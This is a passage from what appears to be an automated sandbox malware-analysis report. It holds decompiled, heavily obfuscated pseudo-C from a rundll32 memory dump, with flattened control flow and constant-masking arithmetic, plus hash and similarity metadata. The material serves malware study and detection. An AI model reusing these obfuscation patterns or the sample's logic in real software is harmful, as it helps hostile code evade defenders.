                                                                                                                          				_v40 = _v40 + 0x9b9c;
                                                                                                                          				_v40 = _v40 ^ 0x00bc2d0e;
                                                                                                                          				_v56 = 0x9e5686;
                                                                                                                          				_v56 = _v56 + 0xffffd134;
                                                                                                                          				_v56 = _v56 + 0xffff1440;
                                                                                                                          				_v56 = _v56 ^ 0x0091c9b6;
                                                                                                                          				_v60 = 0xb7e614;
                                                                                                                          				_v60 = _v60 << 3;
                                                                                                                          				_v60 = _v60 >> 8;
                                                                                                                          				_v60 = _v60 ^ 0x00065aea;
                                                                                                                          				_v32 = 0x537989;
                                                                                                                          				_v32 = _v32 + 0xffff7fce;
                                                                                                                          				_v32 = _v32 ^ 0x005430a6;
                                                                                                                          				_v92 = 0x1586eb;
                                                                                                                          				_t255 = 0x27;
                                                                                                                          				_v92 = _v92 * 0x18;
                                                                                                                          				_v92 = _v92 >> 7;
                                                                                                                          				_v92 = _v92 * 0x26;
                                                                                                                          				_v92 = _v92 ^ 0x009f543a;
                                                                                                                          				_v52 = 0xc32f0b;
                                                                                                                          				_v52 = _v52 | 0xcd8d244f;
                                                                                                                          				_v52 = _v52 >> 4;
                                                                                                                          				_v52 = _v52 ^ 0x0cd427c3;
                                                                                                                          				_v36 = 0xd9cf6a;
                                                                                                                          				_v36 = _v36 / _t255;
                                                                                                                          				_v36 = _v36 ^ 0x000f5a1a;
                                                                                                                          				_v16 = 0xbb623f;
                                                                                                                          				_v16 = _v16 ^ 0xe760556d;
                                                                                                                          				_v16 = _v16 ^ 0xe7dfff62;
                                                                                                                          				_v76 = 0x7fa35c;
                                                                                                                          				_v76 = _v76 >> 0xa;
                                                                                                                          				_v76 = _v76 + 0xffff049d;
                                                                                                                          				_v76 = _v76 ^ 0x38c60922;
                                                                                                                          				_v76 = _v76 ^ 0xc73f93c8;
                                                                                                                          				_v80 = 0x34ea16;
                                                                                                                          				_v80 = _v80 | 0x70dfffff;
                                                                                                                          				_t256 = 0x78;
                                                                                                                          				_t257 = _v16;
                                                                                                                          				_t260 = _v16;
                                                                                                                          				_t224 = _v16;
                                                                                                                          				_v80 = _v80 / _t256;
                                                                                                                          				_v80 = _v80 ^ 0x00f0b2be;
                                                                                                                          				_v48 = 0x2ab377;
                                                                                                                          				_v48 = _v48 << 0xd;
                                                                                                                          				_v48 = _v48 + 0x21bb;
                                                                                                                          				_v48 = _v48 ^ 0x5663e2ae;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_push(0x5c);
                                                                                                                          					while(_t225 != 0xb8820d) {
                                                                                                                          						if(_t225 == 0x1effdba) {
                                                                                                                          							_t219 = E0079912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
                                                                                                                          							_t224 = _t219;
                                                                                                                          							_t261 =  &(_t261[5]);
                                                                                                                          							if(_t219 != 0) {
                                                                                                                          								_t225 = 0xb9a00d9;
                                                                                                                          								goto L11;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							if(_t225 == 0x37f2dd7) {
                                                                                                                          								_t225 = 0x43cb3ac;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t225 == 0x43cb3ac) {
                                                                                                                          									_t258 =  *0x7b3e10; // 0x0
                                                                                                                          									_t259 = _t258 + 0x1c;
                                                                                                                          									while( *_t259 != _t246) {
                                                                                                                          										_t259 = _t259 + 2;
                                                                                                                          									}
                                                                                                                          									_t257 = _t259 + 2;
                                                                                                                          									_t225 = 0x1effdba;
                                                                                                                          									goto L12;
                                                                                                                          								} else {
                                                                                                                          									if(_t225 == 0x5d9bea5) {
                                                                                                                          										E007A8F9E(_v32, _v92, _v52, _v36, _t260);
                                                                                                                          										_t261 =  &(_t261[3]);
                                                                                                                          										_t225 = 0xb8820d;
                                                                                                                          										goto L11;
                                                                                                                          									} else {
                                                                                                                          										if(_t225 == _t218) {
                                                                                                                          											E0079E249(_v96, _t260, _v40, _v56, _v60);
                                                                                                                          											_t261 =  &(_t261[3]);
                                                                                                                          											_t251 =  !=  ? 1 : _t251;
                                                                                                                          											_t225 = 0x5d9bea5;
                                                                                                                          											L11:
                                                                                                                          											_t246 = 0x5c;
                                                                                                                          											L12:
                                                                                                                          											_t218 = 0x9850ebe;
                                                                                                                          											continue;
                                                                                                                          										} else {
                                                                                                                          											if(_t225 != 0xb9a00d9) {
                                                                                                                          												L22:
                                                                                                                          												if(_t225 != 0x8a80d0f) {
                                                                                                                          													continue;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												_t260 = E007942C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
                                                                                                                          												_t261 =  &(_t261[5]);
                                                                                                                          												_t218 = 0x9850ebe;
                                                                                                                          												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
                                                                                                                          												goto L1;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						return _t251;
                                                                                                                          					}
                                                                                                                          					E007A8F9E(_v16, _v76, _v80, _v48, _t224);
                                                                                                                          					_t261 =  &(_t261[3]);
                                                                                                                          					_t225 = 0x8a80d0f;
                                                                                                                          					_t218 = 0x9850ebe;
                                                                                                                          					_t246 = 0x5c;
                                                                                                                          					goto L22;
                                                                                                                          				}
                                                                                                                          			}











































                                                                                                                          0x007a4b42
                                                                                                                          0x007a4b44
                                                                                                                          0x00000000
                                                                                                                          0x007a4b44
                                                                                                                          0x007a4a43
                                                                                                                          0x007a4a49
                                                                                                                          0x007a4b16
                                                                                                                          0x00000000
                                                                                                                          0x007a4a4f
                                                                                                                          0x007a4a55
                                                                                                                          0x007a4af9
                                                                                                                          0x007a4aff
                                                                                                                          0x007a4b07
                                                                                                                          0x007a4b04
                                                                                                                          0x007a4b04
                                                                                                                          0x007a4b0c
                                                                                                                          0x007a4b0f
                                                                                                                          0x00000000
                                                                                                                          0x007a4a5b
                                                                                                                          0x007a4a61
                                                                                                                          0x007a4aea
                                                                                                                          0x007a4aef
                                                                                                                          0x007a4af2
                                                                                                                          0x00000000
                                                                                                                          0x007a4a63
                                                                                                                          0x007a4a65
                                                                                                                          0x007a4ab7
                                                                                                                          0x007a4abe
                                                                                                                          0x007a4ac4
                                                                                                                          0x007a4ac7
                                                                                                                          0x007a4acc
                                                                                                                          0x007a4ace
                                                                                                                          0x007a4acf
                                                                                                                          0x007a4acf
                                                                                                                          0x00000000
                                                                                                                          0x007a4a67
                                                                                                                          0x007a4a6d
                                                                                                                          0x007a4b71
                                                                                                                          0x007a4b77
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a4a73
                                                                                                                          0x007a4a8f
                                                                                                                          0x007a4a91
                                                                                                                          0x007a4a9b
                                                                                                                          0x007a4aa0
                                                                                                                          0x00000000
                                                                                                                          0x007a4aa0
                                                                                                                          0x007a4a6d
                                                                                                                          0x007a4a65
                                                                                                                          0x007a4a61
                                                                                                                          0x007a4a55
                                                                                                                          0x007a4a49
                                                                                                                          0x007a4b86
                                                                                                                          0x007a4b86
                                                                                                                          0x007a4b5c
                                                                                                                          0x007a4b61
                                                                                                                          0x007a4b64
                                                                                                                          0x007a4b69
                                                                                                                          0x007a4b70
                                                                                                                          0x00000000
                                                                                                                          0x007a4b70

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ^T$mU`
                                                                                                                          • API String ID: 0-1245783925
                                                                                                                          • Opcode ID: 14a0216aa58d837f0d17bc661d19bf9ab9851ba03476a8c36cb2a798597eedc7
                                                                                                                          • Instruction ID: ed038b7e96c1551f06a98fa14fbcb7022272703615eb4e0b40b2ca1435bc04c5
                                                                                                                          • Opcode Fuzzy Hash: 14a0216aa58d837f0d17bc661d19bf9ab9851ba03476a8c36cb2a798597eedc7
                                                                                                                          • Instruction Fuzzy Hash: 4FB130715093409FC358CF65898A41BFBE1FBC9758F108A1DF69AA6260D3B5CA49CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E007AA666(intOrPtr* __ecx) {
                                                                                                                          				char _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				signed int _v140;
                                                                                                                          				intOrPtr* _v144;
                                                                                                                          				signed int _v148;
                                                                                                                          				signed int _v152;
                                                                                                                          				signed int _v156;
                                                                                                                          				signed int _v160;
                                                                                                                          				signed int _v164;
                                                                                                                          				signed int _v168;
                                                                                                                          				signed int _v172;
                                                                                                                          				signed int _v176;
                                                                                                                          				signed int _v180;
                                                                                                                          				signed int _v184;
                                                                                                                          				signed int _v188;
                                                                                                                          				signed int _v192;
                                                                                                                          				signed int _v196;
                                                                                                                          				signed int _v200;
                                                                                                                          				signed int _v204;
                                                                                                                          				signed int _v208;
                                                                                                                          				void* _t185;
                                                                                                                          				void* _t187;
                                                                                                                          				signed int _t194;
                                                                                                                          				signed int _t203;
                                                                                                                          				intOrPtr* _t204;
                                                                                                                          				signed int _t231;
                                                                                                                          				signed int _t232;
                                                                                                                          				signed int _t233;
                                                                                                                          				signed int _t234;
                                                                                                                          				signed int _t235;
                                                                                                                          				void* _t236;
                                                                                                                          				signed int _t239;
                                                                                                                          				signed int* _t240;
                                                                                                                          
                                                                                                                          				_t204 = __ecx;
                                                                                                                          				_t240 =  &_v208;
                                                                                                                          				_v144 = __ecx;
                                                                                                                          				_v188 = 0x57b051;
                                                                                                                          				_v188 = _v188 ^ 0x0e33ee27;
                                                                                                                          				_v188 = _v188 * 0x1d;
                                                                                                                          				_t236 = 0xac5721c;
                                                                                                                          				_v188 = _v188 << 4;
                                                                                                                          				_v188 = _v188 ^ 0x15e508b7;
                                                                                                                          				_v156 = 0xb3c586;
                                                                                                                          				_v156 = _v156 + 0xc4f5;
                                                                                                                          				_v156 = _v156 ^ 0x00bed25a;
                                                                                                                          				_v168 = 0x711032;
                                                                                                                          				_v168 = _v168 << 8;
                                                                                                                          				_v168 = _v168 + 0x5169;
                                                                                                                          				_v168 = _v168 ^ 0x711dace8;
                                                                                                                          				_v192 = 0xa2549d;
                                                                                                                          				_v192 = _v192 + 0x52ae;
                                                                                                                          				_v192 = _v192 >> 1;
                                                                                                                          				_v192 = _v192 >> 3;
                                                                                                                          				_v192 = _v192 ^ 0x000eb53b;
                                                                                                                          				_v140 = 0xe7e5a1;
                                                                                                                          				_t231 = 0x32;
                                                                                                                          				_v140 = _v140 * 0x50;
                                                                                                                          				_v140 = _v140 ^ 0x4874e895;
                                                                                                                          				_v208 = 0x1967bb;
                                                                                                                          				_v208 = _v208 << 4;
                                                                                                                          				_v208 = _v208 | 0x201d9a42;
                                                                                                                          				_v208 = _v208 / _t231;
                                                                                                                          				_v208 = _v208 ^ 0x00a7f54f;
                                                                                                                          				_v152 = 0x52a7fc;
                                                                                                                          				_v152 = _v152 + 0x45a2;
                                                                                                                          				_v152 = _v152 ^ 0x0052edd3;
                                                                                                                          				_v160 = 0x3027b3;
                                                                                                                          				_v160 = _v160 + 0xfd14;
                                                                                                                          				_v160 = _v160 ^ 0x0036c553;
                                                                                                                          				_v180 = 0x38862e;
                                                                                                                          				_v180 = _v180 ^ 0x0f350481;
                                                                                                                          				_t232 = 0x7c;
                                                                                                                          				_v180 = _v180 * 0x65;
                                                                                                                          				_v180 = _v180 ^ 0xf053ee57;
                                                                                                                          				_v136 = 0x356a19;
                                                                                                                          				_v136 = _v136 ^ 0xbed63dcb;
                                                                                                                          				_v136 = _v136 ^ 0xbeeb3706;
                                                                                                                          				_v164 = 0x14aaf;
                                                                                                                          				_v164 = _v164 + 0xffffc1af;
                                                                                                                          				_v164 = _v164 ^ 0x000285a1;
                                                                                                                          				_v200 = 0x7f3e04;
                                                                                                                          				_v200 = _v200 * 0x53;
                                                                                                                          				_v200 = _v200 + 0xffffdc1b;
                                                                                                                          				_v200 = _v200 + 0x69f9;
                                                                                                                          				_v200 = _v200 ^ 0x2945b47b;
                                                                                                                          				_v148 = 0xc6ed1e;
                                                                                                                          				_v148 = _v148 >> 6;
                                                                                                                          				_v148 = _v148 ^ 0x0006dab0;
                                                                                                                          				_v172 = 0x6d07b9;
                                                                                                                          				_v172 = _v172 / _t232;
                                                                                                                          				_t233 = 0x35;
                                                                                                                          				_v172 = _v172 / _t233;
                                                                                                                          				_v172 = _v172 ^ 0x00041e3e;
                                                                                                                          				_v204 = 0x57aab;
                                                                                                                          				_v204 = _v204 + 0xdcdc;
                                                                                                                          				_v204 = _v204 * 0x48;
                                                                                                                          				_v204 = _v204 << 8;
                                                                                                                          				_v204 = _v204 ^ 0xc89fb5e3;
                                                                                                                          				_v132 = 0xff84eb;
                                                                                                                          				_v132 = _v132 << 5;
                                                                                                                          				_v132 = _v132 ^ 0x1ff23c26;
                                                                                                                          				_v196 = 0xcb0ee1;
                                                                                                                          				_v196 = _v196 | 0xd8d8bfc1;
                                                                                                                          				_v196 = _v196 << 4;
                                                                                                                          				_v196 = _v196 ^ 0x8dbe7284;
                                                                                                                          				_v184 = 0x3f345e;
                                                                                                                          				_t234 = 0x7b;
                                                                                                                          				_v184 = _v184 * 0x5e;
                                                                                                                          				_v184 = _v184 ^ 0x1738d684;
                                                                                                                          				_v176 = 0x75d12f;
                                                                                                                          				_t239 = _v184;
                                                                                                                          				_t203 = _v184;
                                                                                                                          				_t235 = _v184;
                                                                                                                          				_v176 = _v176 / _t234;
                                                                                                                          				_v176 = _v176 + 0xb925;
                                                                                                                          				_v176 = _v176 ^ 0x0007fac1;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t185 = 0x80ddafd;
                                                                                                                          					do {
                                                                                                                          						while(_t236 != 0x3002390) {
                                                                                                                          							if(_t236 == _t185) {
                                                                                                                          								_push(_v204);
                                                                                                                          								_push(_v172);
                                                                                                                          								_t187 = E007ADCF7(_v148, 0x791540, __eflags);
                                                                                                                          								_push(_t235);
                                                                                                                          								_push( &_v128);
                                                                                                                          								_push(_t187);
                                                                                                                          								_push(_t239);
                                                                                                                          								_push(_t203);
                                                                                                                          								 *((intOrPtr*)(E0079A42D(0xab2a8d8a, 0x2b7)))();
                                                                                                                          								E0079A8B0(_v132, _t187, _v196);
                                                                                                                          								_t236 = 0xc2d90a2;
                                                                                                                          								goto L11;
                                                                                                                          							} else {
                                                                                                                          								if(_t236 == 0x94501ee) {
                                                                                                                          									_t194 = E007A0AE0(0x10, 1);
                                                                                                                          									_push(_v140);
                                                                                                                          									_t239 = _t194;
                                                                                                                          									_push( &_v128);
                                                                                                                          									_push(_t239);
                                                                                                                          									_push(0xb);
                                                                                                                          									E007980E3(_v168, _v192);
                                                                                                                          									_t236 = 0x3002390;
                                                                                                                          									L11:
                                                                                                                          									_t240 =  &(_t240[6]);
                                                                                                                          									L12:
                                                                                                                          									_t204 = _v144;
                                                                                                                          									goto L1;
                                                                                                                          								} else {
                                                                                                                          									if(_t236 == 0xac5721c) {
                                                                                                                          										_t236 = 0x94501ee;
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          										if(_t236 == 0xc2d90a2) {
                                                                                                                          											E007A8519(_v184, _v176, _t235);
                                                                                                                          										} else {
                                                                                                                          											if(_t236 != 0xd4e1cec) {
                                                                                                                          												goto L17;
                                                                                                                          											} else {
                                                                                                                          												_t239 = 0x4000;
                                                                                                                          												_push(_t204);
                                                                                                                          												_push(_t204);
                                                                                                                          												_t203 = E00797FF2(0x4000);
                                                                                                                          												_t185 = 0x80ddafd;
                                                                                                                          												_t204 = _v144;
                                                                                                                          												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
                                                                                                                          												continue;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L20:
                                                                                                                          							return _t203;
                                                                                                                          						}
                                                                                                                          						_t235 = E00794816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
                                                                                                                          						_t240 =  &(_t240[4]);
                                                                                                                          						__eflags = _t235;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							_t204 = _v144;
                                                                                                                          							_t236 = 0x99c1651;
                                                                                                                          							_t185 = 0x80ddafd;
                                                                                                                          							goto L17;
                                                                                                                          						} else {
                                                                                                                          							_t236 = 0xd4e1cec;
                                                                                                                          							goto L12;
                                                                                                                          						}
                                                                                                                          						goto L20;
                                                                                                                          						L17:
                                                                                                                          						__eflags = _t236 - 0x99c1651;
                                                                                                                          					} while (__eflags != 0);
                                                                                                                          					goto L20;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ^4?$iQ
                                                                                                                          • API String ID: 0-3971506469
                                                                                                                          • Opcode ID: f7c20ef400bfa0675bbb76efb4786e472a1da45e483af38b8dda373c46284851
                                                                                                                          • Instruction ID: 407f9626fdc8ab64400f0f7affda7ce3dacd728d4a61e49ad7fc90628d08d414
                                                                                                                          • Opcode Fuzzy Hash: f7c20ef400bfa0675bbb76efb4786e472a1da45e483af38b8dda373c46284851
                                                                                                                          • Instruction Fuzzy Hash: 83A152719083409FC354CF29D58990BFBE1BBC5758F408A2DF99AA6260C7B9D949CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E007A8BE3() {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				void* _v88;
                                                                                                                          				intOrPtr _v92;
                                                                                                                          				signed int _t203;
                                                                                                                          				short _t206;
                                                                                                                          				short _t211;
                                                                                                                          				signed int _t214;
                                                                                                                          				void* _t216;
                                                                                                                          				intOrPtr _t238;
                                                                                                                          				void* _t239;
                                                                                                                          				void* _t240;
                                                                                                                          				short* _t241;
                                                                                                                          				short* _t242;
                                                                                                                          				signed int _t243;
                                                                                                                          				signed int _t244;
                                                                                                                          				signed int _t245;
                                                                                                                          				signed int _t246;
                                                                                                                          				signed int _t247;
                                                                                                                          				signed int _t248;
                                                                                                                          				signed int _t249;
                                                                                                                          				signed int _t250;
                                                                                                                          				void* _t251;
                                                                                                                          
                                                                                                                          				_v92 = 0x476c75;
                                                                                                                          				asm("stosd");
                                                                                                                          				_t216 = 0xb7209d2;
                                                                                                                          				_t243 = 0x73;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_t238 =  *0x7b3e10; // 0x0
                                                                                                                          				_v16 = 0xe95677;
                                                                                                                          				_t239 = _t238 + 0x1c;
                                                                                                                          				_v16 = _v16 + 0xffffde88;
                                                                                                                          				_v16 = _v16 | 0xcd71b475;
                                                                                                                          				_v16 = _v16 + 0xffffb9cf;
                                                                                                                          				_v16 = _v16 ^ 0xcdf0e35f;
                                                                                                                          				_v48 = 0xdf79ef;
                                                                                                                          				_v48 = _v48 / _t243;
                                                                                                                          				_t244 = 0x6b;
                                                                                                                          				_v48 = _v48 * 0x6d;
                                                                                                                          				_v48 = _v48 ^ 0x00d012e0;
                                                                                                                          				_v20 = 0x9de8b4;
                                                                                                                          				_v20 = _v20 + 0xffff612d;
                                                                                                                          				_v20 = _v20 / _t244;
                                                                                                                          				_v20 = _v20 ^ 0xc642351f;
                                                                                                                          				_v20 = _v20 ^ 0xc646a40f;
                                                                                                                          				_v52 = 0x8fb5bf;
                                                                                                                          				_v52 = _v52 << 0xa;
                                                                                                                          				_v52 = _v52 | 0x07a5acc8;
                                                                                                                          				_v52 = _v52 ^ 0x3ff13d54;
                                                                                                                          				_v68 = 0x5451dc;
                                                                                                                          				_v68 = _v68 << 4;
                                                                                                                          				_v68 = _v68 ^ 0x054b95e9;
                                                                                                                          				_v56 = 0x52bd8b;
                                                                                                                          				_v56 = _v56 >> 2;
                                                                                                                          				_t245 = 0x43;
                                                                                                                          				_v56 = _v56 * 0x7a;
                                                                                                                          				_v56 = _v56 ^ 0x09d97bb2;
                                                                                                                          				_v24 = 0x3d3b88;
                                                                                                                          				_v24 = _v24 / _t245;
                                                                                                                          				_v24 = _v24 + 0xfffff551;
                                                                                                                          				_v24 = _v24 ^ 0x58fd9949;
                                                                                                                          				_v24 = _v24 ^ 0x58f7485b;
                                                                                                                          				_v28 = 0x8d7fa4;
                                                                                                                          				_v28 = _v28 | 0x74f1f66b;
                                                                                                                          				_v28 = _v28 + 0xbcb0;
                                                                                                                          				_t246 = 0x1d;
                                                                                                                          				_v28 = _v28 / _t246;
                                                                                                                          				_v28 = _v28 ^ 0x0406308a;
                                                                                                                          				_v76 = 0xb13dbd;
                                                                                                                          				_v76 = _v76 >> 4;
                                                                                                                          				_v76 = _v76 ^ 0x0001a54a;
                                                                                                                          				_v72 = 0x3dff58;
                                                                                                                          				_v72 = _v72 + 0xffff5d9c;
                                                                                                                          				_v72 = _v72 ^ 0x00301633;
                                                                                                                          				_v8 = 0xd63a62;
                                                                                                                          				_v8 = _v8 >> 4;
                                                                                                                          				_v8 = _v8 << 5;
                                                                                                                          				_v8 = _v8 ^ 0xdca434f7;
                                                                                                                          				_v8 = _v8 ^ 0xdd0cf0dc;
                                                                                                                          				_v44 = 0x6f20d8;
                                                                                                                          				_v44 = _v44 >> 0xb;
                                                                                                                          				_v44 = _v44 ^ 0xaa766a49;
                                                                                                                          				_v44 = _v44 ^ 0xaa79f73d;
                                                                                                                          				_v64 = 0x5810b3;
                                                                                                                          				_t247 = 0x3e;
                                                                                                                          				_v64 = _v64 * 0x13;
                                                                                                                          				_v64 = _v64 ^ 0x068d2e2f;
                                                                                                                          				_v60 = 0xa1705b;
                                                                                                                          				_v60 = _v60 / _t247;
                                                                                                                          				_v60 = _v60 ^ 0x000746d3;
                                                                                                                          				_v12 = 0xe49076;
                                                                                                                          				_v12 = _v12 | 0xf94b921d;
                                                                                                                          				_t248 = 0x66;
                                                                                                                          				_v12 = _v12 / _t248;
                                                                                                                          				_v12 = _v12 | 0x30c6fb91;
                                                                                                                          				_v12 = _v12 ^ 0x32fd72cc;
                                                                                                                          				_v40 = 0x4af1f5;
                                                                                                                          				_v40 = _v40 + 0xffff1f3a;
                                                                                                                          				_v40 = _v40 + 0x5998;
                                                                                                                          				_v40 = _v40 | 0x0efc634a;
                                                                                                                          				_v40 = _v40 ^ 0x0ef1d3e1;
                                                                                                                          				_v36 = 0xca0e2e;
                                                                                                                          				_v36 = _v36 + 0xa6ab;
                                                                                                                          				_v36 = _v36 * 0x17;
                                                                                                                          				_v36 = _v36 | 0xed84f45f;
                                                                                                                          				_v36 = _v36 ^ 0xffb3e96f;
                                                                                                                          				_v32 = 0x9f068d;
                                                                                                                          				_v32 = _v32 | 0xccdcedf7;
                                                                                                                          				_v32 = _v32 >> 8;
                                                                                                                          				_v32 = _v32 << 0x10;
                                                                                                                          				_v32 = _v32 ^ 0xdfe821c7;
                                                                                                                          				do {
                                                                                                                          					while(_t216 != 0x5ccdb59) {
                                                                                                                          						if(_t216 == 0x80e5149) {
                                                                                                                          							_push(_v32);
                                                                                                                          							_push(_t239);
                                                                                                                          							_push(3);
                                                                                                                          							_push(1);
                                                                                                                          							E007980E3(_v40, _v36);
                                                                                                                          							 *((short*)(_t239 + 6)) = 0;
                                                                                                                          							return 0;
                                                                                                                          						}
                                                                                                                          						if(_t216 == 0xb7209d2) {
                                                                                                                          							_t211 = E007AD25E(_t216);
                                                                                                                          							_t216 = 0x5ccdb59;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t216 != 0xeb2e9e3) {
                                                                                                                          							goto L8;
                                                                                                                          						}
                                                                                                                          						_t214 = E007A0AE0(0x10, 4);
                                                                                                                          						_push(_v12);
                                                                                                                          						_t250 = _t214;
                                                                                                                          						_push(_t239);
                                                                                                                          						_push(_t250);
                                                                                                                          						_push(1);
                                                                                                                          						E007980E3(_v64, _v60);
                                                                                                                          						_t251 = _t251 + 0x18;
                                                                                                                          						_t242 = _t239 + _t250 * 2;
                                                                                                                          						_t216 = 0x80e5149;
                                                                                                                          						_t211 = 0x2e;
                                                                                                                          						 *_t242 = _t211;
                                                                                                                          						_t239 = _t242 + 2;
                                                                                                                          					}
                                                                                                                          					_t203 = E007A0AE0(0x10, 4);
                                                                                                                          					_push(_v24);
                                                                                                                          					_t249 = _t203;
                                                                                                                          					_push(_t239);
                                                                                                                          					_push(1);
                                                                                                                          					_push(2);
                                                                                                                          					E007980E3(_v68, _v56);
                                                                                                                          					_push(_v72);
                                                                                                                          					_t240 = _t239 + 2;
                                                                                                                          					_push(_t240);
                                                                                                                          					_push(_t249);
                                                                                                                          					_push(1);
                                                                                                                          					E007980E3(_v28, _v76);
                                                                                                                          					_t251 = _t251 + 0x28;
                                                                                                                          					_t241 = _t240 + _t249 * 2;
                                                                                                                          					_t216 = 0xeb2e9e3;
                                                                                                                          					_t206 = 0x5c;
                                                                                                                          					 *_t241 = _t206;
                                                                                                                          					_t239 = _t241 + 2;
                                                                                                                          					L8:
                                                                                                                          				} while (_t216 != 0x3f21c37);
                                                                                                                          				return _t211;
                                                                                                                          			}











































                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ulG$wV
                                                                                                                          • API String ID: 0-391097709
                                                                                                                          • Opcode ID: b9e0d252ff158ac3f6cd29ac6509df0288fe14b0c99cb0a6914e03152cd0da55
                                                                                                                          • Instruction ID: 3b229cb78f3460aeb588d18614567ad9147c89b6d4011a4e9b0a2f5db7b1af5d
                                                                                                                          • Opcode Fuzzy Hash: b9e0d252ff158ac3f6cd29ac6509df0288fe14b0c99cb0a6914e03152cd0da55
                                                                                                                          • Instruction Fuzzy Hash: 47916471D01219EBDF54CFE9D88AADEBBB1FF44314F20810AE216BA290D7B41A45CF95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E00796D24() {
                                                                                                                          				char _v524;
                                                                                                                          				signed int _v528;
                                                                                                                          				signed int _v532;
                                                                                                                          				signed int _v536;
                                                                                                                          				signed int _v540;
                                                                                                                          				signed int _v544;
                                                                                                                          				signed int _v548;
                                                                                                                          				signed int _v552;
                                                                                                                          				signed int _v556;
                                                                                                                          				signed int _v560;
                                                                                                                          				signed int _v564;
                                                                                                                          				signed int _v568;
                                                                                                                          				signed int _v572;
                                                                                                                          				signed int _v576;
                                                                                                                          				signed int _v580;
                                                                                                                          				signed int _v584;
                                                                                                                          				signed int _v588;
                                                                                                                          				signed int _v592;
                                                                                                                          				short* _t158;
                                                                                                                          				void* _t161;
                                                                                                                          				void* _t164;
                                                                                                                          				intOrPtr _t173;
                                                                                                                          				intOrPtr _t188;
                                                                                                                          				signed int _t192;
                                                                                                                          				signed int _t193;
                                                                                                                          				signed int _t194;
                                                                                                                          				signed int _t195;
                                                                                                                          				void* _t198;
                                                                                                                          
                                                                                                                          				_v556 = 0x5b9523;
                                                                                                                          				_v556 = _v556 ^ 0xd644881d;
                                                                                                                          				_t164 = 0xafec1cc;
                                                                                                                          				_v556 = _v556 ^ 0xd61fc18a;
                                                                                                                          				_v560 = 0xf0211a;
                                                                                                                          				_v560 = _v560 >> 0xc;
                                                                                                                          				_v560 = _v560 >> 0xf;
                                                                                                                          				_v560 = _v560 ^ 0x000d86e8;
                                                                                                                          				_v536 = 0x5b86ee;
                                                                                                                          				_t192 = 0x7a;
                                                                                                                          				_v536 = _v536 / _t192;
                                                                                                                          				_v536 = _v536 ^ 0x00051f37;
                                                                                                                          				_v528 = 0x15dba1;
